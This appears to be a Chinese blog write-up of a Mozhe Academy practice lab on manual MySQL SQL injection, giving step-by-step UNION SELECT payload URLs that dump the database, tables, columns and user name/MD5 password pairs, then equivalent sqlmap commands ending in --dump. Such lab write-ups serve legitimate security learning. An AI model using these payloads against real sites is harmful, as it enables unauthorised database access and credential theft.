《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
作者: susususuao
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
一:思路
背景介绍
安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
流程
- 掌握SQL注入原理;
- 了解手工注入的方法;
- 了解MySQL的数据结构;
- 了解字符串的MD5加解密;
二:方法
方法一:手工注入
1. 开启靶场进入环境后发现一个登陆页面。(原以为此页面有注入点,各种尝试最终无疾而终,在查看源码时发现存在一个新的URL)
首页:
首页源码:
新的URL连接:
2.发现熟悉的字符参数?id=1经过一顿操作发现当id=1 and 1=1 页面返回正常,当and 1=2 页面返回异常,说明有注入漏洞。
3. 开始手工注入
- 通过order by参数寻找存在4列数
http://youIP/new_list.php?id=1 order by 4
- 寻找显示为(这里为什么要是-1不多解释)
http://youIP/new_list.php?id=-1 union select 1,2,3,4
- 爆库名
http://youIP/new_list.php?id=-1 union select 1,2,database(),4
数据库名:mozhe_Discuz_StormGroup
- 爆表
http://youIP/new_list.php?id=-1 union select 1, 2,group_concat(table_name) ,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
表名:StormGroup_member,notice。(猜测第一个表是我们要的表)
- 爆列
http://youIP/new_list.php?id=-1 union select 1, 2,group_concat(column_name) ,4 from information_schema.columns where table_name='StormGroup_member'
字段:id,name,password,status
- 爆字段
发现有两个账号,用户名都是mozhe,密码不一样。
http://youIP/new_list.php?id=-1 union select 1, 2,group_concat(concat_ws('~',name,password)) ,4 from mozhe_Discuz_StormGroup.StormGroup_member
字段:mozhe~ 356f589a7df439f6f744ff19bb8092c0,mozhe~ c8e100ea135c6a8346b3e0747eb78060
- MD5解密
解密第一个密码
发现这个账号密码别禁用了
解密第二个密码
这个可以登陆进去,并且我们发现下面存在的KEY。
方法二:工具注入(sqlmap)
- 爆数据库名和当前用户
sqlmap -u "http://youIP/new_list.php?id=1" -b --current-db --current-user
- 爆表
sqlmap -u "http://youIP/new_list.php?id=1" -D mozhe_Discuz_StormGroup -tables
- 爆列
sqlmap -u "http://youIP/new_list.php?id=1" -D mozhe_Discuz_StormGroup -T StormGroup_member -columns
- 爆字段信息
sqlmap -u "http://youIP/new_list.php?id=1" -D mozhe_Discuz_StormGroup -T StormGroup_member -C name,password --dump
最后在进行MD5解密可以得出密码。
《墨者学院——SQL手工注入漏洞测试(MySQL数据库)》相关推荐
- ComeFuture英伽学院——2020年 全国大学生英语竞赛【C类初赛真题解析】(持续更新)
视频:ComeFuture英伽学院--2019年 全国大学生英语竞赛[C类初赛真题解析]大小作文--详细解析 课件:[课件]2019年大学生英语竞赛C类初赛.pdf 视频:2020年全国大学生英语竞赛 ...
- ComeFuture英伽学院——2019年 全国大学生英语竞赛【C类初赛真题解析】大小作文——详细解析
视频:ComeFuture英伽学院--2019年 全国大学生英语竞赛[C类初赛真题解析]大小作文--详细解析 课件:[课件]2019年大学生英语竞赛C类初赛.pdf 视频:2020年全国大学生英语竞赛 ...
- 信息学奥赛真题解析(玩具谜题)
玩具谜题(2016年信息学奥赛提高组真题) 题目描述 小南有一套可爱的玩具小人, 它们各有不同的职业.有一天, 这些玩具小人把小南的眼镜藏了起来.小南发现玩具小人们围成了一个圈,它们有的面朝圈内,有的 ...
- 信息学奥赛之初赛 第1轮 讲解(01-08课)
信息学奥赛之初赛讲解 01 计算机概述 系统基本结构 信息学奥赛之初赛讲解 01 计算机概述 系统基本结构_哔哩哔哩_bilibili 信息学奥赛之初赛讲解 02 软件系统 计算机语言 进制转换 信息 ...
- 信息学奥赛一本通习题答案(五)
最近在给小学生做C++的入门培训,用的教程是信息学奥赛一本通,刷题网址 http://ybt.ssoier.cn:8088/index.php 现将部分习题的答案放在博客上,希望能给其他有需要的人带来 ...
- 信息学奥赛一本通习题答案(三)
最近在给小学生做C++的入门培训,用的教程是信息学奥赛一本通,刷题网址 http://ybt.ssoier.cn:8088/index.php 现将部分习题的答案放在博客上,希望能给其他有需要的人带来 ...
- 信息学奥赛一本通 提高篇 第六部分 数学基础 相关的真题
第1章 快速幂 1875:[13NOIP提高组]转圈游戏 信息学奥赛一本通(C++版)在线评测系统 第2 章 素数 第 3 章 约数 第 4 章 同余问题 第 5 章 矩阵乘法 第 6 章 ...
- 信息学奥赛一本通题目代码(非题库)
为了完善自己学c++,很多人都去读相关文献,就比如<信息学奥赛一本通>,可又对题目无从下手,从今天开始,我将把书上的题目一 一的解析下来,可以做参考,如果有错,可以告诉我,将在下次解析里重 ...
- 信息学奥赛一本通(C++版) 刷题 记录
总目录详见:https://blog.csdn.net/mrcrack/article/details/86501716 信息学奥赛一本通(C++版) 刷题 记录 http://ybt.ssoier. ...
- 最近公共祖先三种算法详解 + 模板题 建议新手收藏 例题: 信息学奥赛一本通 祖孙询问 距离
首先什么是最近公共祖先?? 如图:红色节点的祖先为红色的1, 2, 3. 绿色节点的祖先为绿色的1, 2, 3, 4. 他们的最近公共祖先即他们最先相交的地方,如在上图中黄色的点就是他们的最近公共祖先 ...
最新文章
- ASP.NET无刷新客户端回调
- Cannot change version of project facet Dynamic Web Module to 2.5 问题的解决方法
- ef mysql 数据模型,EF Core使用CodeFirst在MySql中创建新数据库以及已有的Mysql数据库如何使用DB First生成域模型...
- 昕灵感应流行坊(Shop.25941.Cn)^_^全新开张
- Day-10: 错误、调试和测试
- 1.5 编程基础之循环控制 35 求出e的值
- 我的项目经验v3.0
- 误删MySQL数据库中的mysql库怎么恢复
- 16进制颜色码对照表
- 绘制网络组建拓扑图方法分享
- Eclipse Mars2在线安装svn详细步骤
- DWG文件如何转换为PDF黑白文件
- 会议OA项目之我的审批
- tesra内测阶段在线GPU的使用
- 仙童半导体和“八叛逆”所缔造的硅谷模式
- 英语教师计算机研修总结报告,英语教师研修总结范文(通用5篇)
- HTML 框架 noresize=noresize 作用
- 20221103 C语言自学笔记第一天
- 计算广告中的常用术语概述
- 给IntelliJ IDEA换了个皮肤,加了几个插件,发现我爱上了敲代码:)